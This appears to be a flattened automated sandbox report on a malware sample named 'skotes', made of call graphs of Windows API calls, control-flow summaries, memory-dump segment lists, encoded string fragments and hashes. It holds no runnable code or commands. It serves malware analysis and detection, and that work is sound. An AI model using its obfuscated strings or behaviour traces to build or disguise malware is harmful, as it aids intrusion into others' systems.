GetPEB RtlAllocateHeap GetPEB __dosmaperr 38169->38197 38171->38158 38173 af6ee6 ListArray 38174 af6f1c CloseHandle 38173->38174 38173->38175 38174->38175 38175->38158 38177 af6863 38176->38177 38182 af6849 __dosmaperr __fassign __wsopen_s 38176->38182 38178 af686a 38177->38178 38180 af6889 __fassign 38177->38180 38178->38182 38183 af69e6 RtlAllocateHeap __wsopen_s 38178->38183 38180->38182 38184 af69e6 RtlAllocateHeap __wsopen_s 38180->38184 38182->38164 38183->38182 38184->38182 38186 af7085 __dosmaperr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 38185->38186 38187 af6fef ListArray 38185->38187 38186->38173 38187->38186 38188 af7028 GetFileInformationByHandle 38187->38188 38188->38186 38189 af703e 38188->38189 38198 af727c 38189->38198 38193 af705b 38194 af7124 SystemTimeToTzSpecificLocalTime 38193->38194 38195 af706e 38194->38195 38196 af7124 SystemTimeToTzSpecificLocalTime 38195->38196 38196->38186 38197->38173 38199 af7292 _wcsrchr 38198->38199 38201 af704a 38199->38201 38212 afbc13 GetPEB GetPEB __dosmaperr __wsopen_s 38199->38212 38208 af7124 38201->38208 38202 af72d6 38202->38201 38213 afbc13 GetPEB GetPEB __dosmaperr __wsopen_s 38202->38213 38204 af72e7 38204->38201 38214 afbc13 GetPEB GetPEB __dosmaperr __wsopen_s 38204->38214 38206 af72f8 38206->38201 38215 afbc13 GetPEB GetPEB __dosmaperr __wsopen_s 38206->38215 38209 af713c 38208->38209 38210 af7142 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 38209->38210 38211 af715c SystemTimeToTzSpecificLocalTime 38209->38211 38210->38193 38211->38210 38212->38202 38213->38204 38214->38206 38215->38201 38252 ac7590 Sleep 38253 ac765e 38252->38253 38254 ac75e3 38252->38254 38255 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38253->38255 38267 add111 SleepConditionVariableCS 38254->38267 38257 ac767a 38255->38257 38259 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38257->38259 38258 ac75ed 38258->38253 38268 add64e RtlAllocateHeap 38258->38268 38260 ac7693 38259->38260 38262 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38260->38262 38264 ac76ac CreateThread Sleep 38262->38264 38263 ac7654 38269 add0c7 RtlWakeAllConditionVariable 38263->38269 38266 ac76d9 Concurrency::details::ContextBase::GetArbitraryAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 38264->38266 38270 ac7430 38264->38270 38267->38258 38268->38263 38269->38253 38271 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38270->38271 38272 ac7465 38271->38272 38273 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38272->38273 38274 ac7478 38273->38274 38275 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38274->38275 38276 ac7488 38275->38276 38277 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38276->38277 38278 ac749d 38277->38278 38279 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38278->38279 38280 ac74b2 38279->38280 38281 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38280->38281 38282 ac74c4 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 38281->38282 38283 afac53 38288 afaa29 38283->38288 38285 afac69 38286 afac92 38285->38286 38296 b01a9c 38285->38296 38289 afaa48 38288->38289 38294 afaa5b __dosmaperr __wsopen_s 38289->38294 38299 b0132b GetPEB GetPEB __dosmaperr __wsopen_s 38289->38299 38291 afabe0 38291->38294 38300 b0132b GetPEB GetPEB __dosmaperr __wsopen_s 38291->38300 38293 afabfe 38293->38294 38301 b0132b GetPEB GetPEB __dosmaperr __wsopen_s 38293->38301 38294->38285 38302 b01461 38296->38302 38298 b01ab7 38298->38286 38299->38291 38300->38293 38301->38294 38303 b0146d __FrameHandler3::FrameUnwindToState 38302->38303 38305 b01474 __dosmaperr __wsopen_s 38303->38305 38306 b01a2e 38303->38306 38305->38298 38307 af698d __wsopen_s 2 API calls 38306->38307 38308 b01a50 38307->38308 38309 af68ed __wsopen_s RtlAllocateHeap 38308->38309 38310 b01a5d 38309->38310 38312 b01a64 __freea 38310->38312 38313 b01abc 38310->38313 38312->38305 38314 b01ad9 __wsopen_s 38313->38314 38326 b01aee __dosmaperr __wsopen_s 38314->38326 38327 b01775 CreateFileW 38314->38327 38316 b01be2 GetFileType 38320 b01c34 __wsopen_s 38316->38320 38316->38326 38317 b01b65 38317->38316 38317->38326 38328 b01775 CreateFileW 38317->38328 38319 b01baa 38319->38316 38319->38326 38321 b01ca1 38320->38321 38329 b01984 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38320->38329 38321->38326 38330 b01522 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38321->38330 38324 b01cd6 38324->38326 38331 b01775 CreateFileW 38324->38331 38326->38312 38327->38317 38328->38319 38329->38321 38330->38324 38331->38326

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 433 ace530-ace843 call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ad9280 call ad8320 call ad8220 call ad8320 call ad7a00 * 3 call acbe30 call ad7a00 * 2 call ac5c10 call ac8580 471 ace8ce-ace9ec 433->471 472 acea1a-acea62 433->472 481 acea99-aceab2 call adcff1 471->481 482 ace9f2-ace9fe 471->482 472->471 475 acea8f-acea96 call add663 472->475 475->481 482->475 484 acea04-acea12 482->484 484->472 486 aceab8-acee79 call af6c6a * 2 call ad7a00 call ac5c10 call ad83c0 call ad8220 GetFileAttributesA call ad7a00 call ac5c10 call ad83c0 call ad8220 GetFileAttributesA 484->486 521 acf5bb-acf66c call ad80c0 486->521 522 acf273-acf28b 486->522 521->522 526 acf699-acf6a0 call add663 521->526 523 acf291-acf29d 522->523 524 acf6a3-acf6b6 522->524 523->526 527 acf2a3-acf2b1 523->527 526->524 527->521 530 acf6cb-acf962 call af6c6a call ad7a00 call ac5c10 call ad7a00 * 4 call ace530 call ad80c0 call ad7a00 call ad80c0 * 2 527->530 565 acf98c-acf9a5 call adcff1 530->565 566 acf964-acf970 530->566 567 acf982-acf989 call add663 566->567 568 acf972-acf980 566->568 567->565 568->567 570 acf9ab-acfb15 call af6c6a call ad7a00 call ac5c10 call ad7a00 * 4 call ace530 568->570 595 acfb3f-acfb4e 570->595 596 acfb17-acfb23 570->596 597 acfb35-acfb3c call add663 596->597 598 acfb25-acfb33 596->598 597->595 598->597 599 acfb4f-acfc6f call af6c6a call ad7a00 call ac9580 call ac9230 call ad8320 598->599 615 acfc70-acfc75 599->615 615->615 616 acfc77-ad0860 call ad80c0 call ad7a00 * 2 call acc360 call af6729 call ad7a00 call ac5c10 call ad7a00 * 4 call ace530 615->616 651 ad088a-ad08a5 call adcff1 616->651 652 ad0862-ad086e 616->652 653 ad0880-ad0887 call add663 652->653 654 ad0870-ad087e 652->654 653->651 654->653 656 ad08ce-ad1537 call af6c6a call ad7a00 call ac5c10 call ad7a00 * 4 call ace530 654->656
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                            • API String ID: 0-2571795437
                                                                                                                                            • Opcode ID: 943ff0e3d4a8509673a55946d88fea1064afaa1b18bf159c1a355f41a4ee3adc
                                                                                                                                            • Instruction ID: 6b8c7897f7b6358cf9731c5c6401897b5f49301b1c3ab6002d9c209673438935
                                                                                                                                            • Opcode Fuzzy Hash: 943ff0e3d4a8509673a55946d88fea1064afaa1b18bf159c1a355f41a4ee3adc
                                                                                                                                            • Instruction Fuzzy Hash: B282D570904288DFEF14EF68CA49BDE7FB6AB05304F508589E805673C6D7795A88CBD2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1977 ac65e0-ac6639 2051 ac663a call 5330e32 1977->2051 2052 ac663a call 5330df6 1977->2052 2053 ac663a call 5330db5 1977->2053 2054 ac663a call 5330d5b 1977->2054 2055 ac663a call 5330c98 1977->2055 2056 ac663a call 5330cbd 1977->2056 2057 ac663a call 5330e1c 1977->2057 2058 ac663a call 5330d80 1977->2058 2059 ac663a call 5330de0 1977->2059 2060 ac663a call 5330e07 1977->2060 2061 ac663a call 5330d05 1977->2061 2062 ac663a call 5330dca 1977->2062 2063 ac663a call 5330ce8 1977->2063 2064 ac663a call 5330d4e 1977->2064 2065 ac663a call 5330c8d 1977->2065 2066 ac663a call 5330ccd 1977->2066 1978 ac663f-ac66b8 LookupAccountNameA call ad7a00 call ac5c10 1984 ac66bc-ac66db call ac22c0 1978->1984 1985 ac66ba 1978->1985 1988 ac670c-ac6712 1984->1988 1989 ac66dd-ac66ec 1984->1989 1985->1984 1990 ac6715-ac671a 1988->1990 1991 ac66ee-ac66fc 1989->1991 1992 ac6702-ac6709 call add663 1989->1992 1990->1990 1995 ac671c-ac6744 call ad7a00 call ac5c10 1990->1995 1991->1992 1993 ac6937 call af6c6a 1991->1993 1992->1988 2000 ac693c call af6c6a 1993->2000 2005 ac6748-ac6769 call ac22c0 1995->2005 2006 ac6746 1995->2006 2004 ac6941-ac6946 call af6c6a 2000->2004 2011 ac679a-ac67ae 2005->2011 2012 ac676b-ac677a 2005->2012 2006->2005 2018 ac6858-ac687c 2011->2018 2019 ac67b4-ac67ba 2011->2019 2013 ac677c-ac678a 2012->2013 2014 ac6790-ac6797 call add663 2012->2014 2013->2000 2013->2014 2014->2011 2021 ac6880-ac6885 2018->2021 2020 ac67c0-ac67ed call ad7a00 call ac5c10 2019->2020 2037 ac67ef 2020->2037 2038 ac67f1-ac6818 call ac22c0 2020->2038 2021->2021 2022 ac6887-ac68ec call ad80c0 * 2 2021->2022 2031 ac68ee-ac68fd 2022->2031 2032 ac6919-ac6936 call adcff1 2022->2032 2034 ac690f-ac6916 call add663 2031->2034 2035 ac68ff-ac690d 2031->2035 2034->2032 2035->2004 2035->2034 2037->2038 2044 ac6849-ac684c 2038->2044 2045 ac681a-ac6829 2038->2045 2044->2020 2048 ac6852 2044->2048 2046 ac683f-ac6846 call add663 2045->2046 2047 ac682b-ac6839 2045->2047 2046->2044 2047->1993 2047->2046 2048->2018 2051->1978 2052->1978 2053->1978 2054->1978 2055->1978 2056->1978 2057->1978 2058->1978 2059->1978 2060->1978 2061->1978 2062->1978 2063->1978 2064->1978 2065->1978 2066->1978
                                                                                                                                            APIs
                                                                                                                                            • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00AC6680
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AccountLookupName
                                                                                                                                            • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                                                                                                            • API String ID: 1484870144-2309319047
                                                                                                                                            • Opcode ID: 45ebb90b4f5ec192ba40cd24050546a4cf5535cc3e6aa7e53f64900bc5195cad
                                                                                                                                            • Instruction ID: 3e3f9edf65b92bd977e636b5e8a69dd4016fb4af51091b1e293b69db830fcdef
                                                                                                                                            • Opcode Fuzzy Hash: 45ebb90b4f5ec192ba40cd24050546a4cf5535cc3e6aa7e53f64900bc5195cad
                                                                                                                                            • Instruction Fuzzy Hash: 3691A0B1A001189BDB28DB28CD85FEDB7B9EB45304F4045EDE51997292DB319BC48FA4

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACEB51
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000), ref: 00ACEC83
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACED98
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
